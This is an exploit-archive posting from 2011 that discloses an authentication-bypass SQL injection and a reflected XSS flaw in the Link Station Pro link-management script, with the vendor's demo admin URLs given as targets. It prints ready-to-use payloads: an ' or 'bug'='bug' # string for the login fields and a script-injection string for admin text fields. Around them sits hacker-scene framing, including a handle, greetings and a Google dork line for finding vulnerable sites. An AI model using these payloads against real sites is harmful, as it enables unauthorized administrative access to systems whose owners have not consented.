Link Station Pro Multiple Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Link Station Pro Multiple Vulnerabilities
# Published : 2011-07-30
# Author :
# Previous Title : DmxReady Bilboard v1.2 SQL Injection Vulnerability
# Next Title : DmxReady Faqs Manager v1.2 SQL Injection Vulnerability

                                              %+
$.......#........4.........|)........0............//       %+


                                              %+
                                                       %+


%++++++++++++++++++++++++++++++++++++++++


# Exploit Title: Link Station Pro Multiple Vulnerabilities
# Vendor:  www.linkstationpro.com
# Date: 28th july,2011
# Author: $#4d0//[r007k17] a.k.a Raghavendra Karthik D (
http://www.shadowrootkit.wordpress.com)
# Google Dork:  ? 2011 Copyright SteveDawson.com
*****************************************************************************************************************************************************************************************
BREIF DESCRIPTION
*****************************
 Link Station Pro is without doubt, the most efficient, easiest and most
configurable reciprocal link management tool available for all your
reciprocal link requirements.

******************************************************************************************************************************************************************************************

(Auth ByPass) SQLi Vulnerability
***************************************
{DEMO} : http://www.linkstationpro.com/Partners/admindemo/index.php

EXPLOIT:
                 Username: ' or 'bug'='bug' #
                 Password: ' or 'bug'='bug' #
Observe: Attackers can use Authentication Bypass to get into Admin Panel in
the site.

Reflected XSS Vulnerability
********************************
EXPLOIT 2:  XSS Vulnerability in admin panel(in most of the text fields)

   {Demo}:
http://www.linkstationpro.com/Partners/admindemo/manage_categories.php
    Exploit:  ">><marquee><h1>XSSed_by_r007k17</h1></marquee>

*****************************************************************************************************************************************************************************************
gr33t1ngs to s1d3 effects and my friends@!3.14--
*****************************************************************************************************************************************************************************************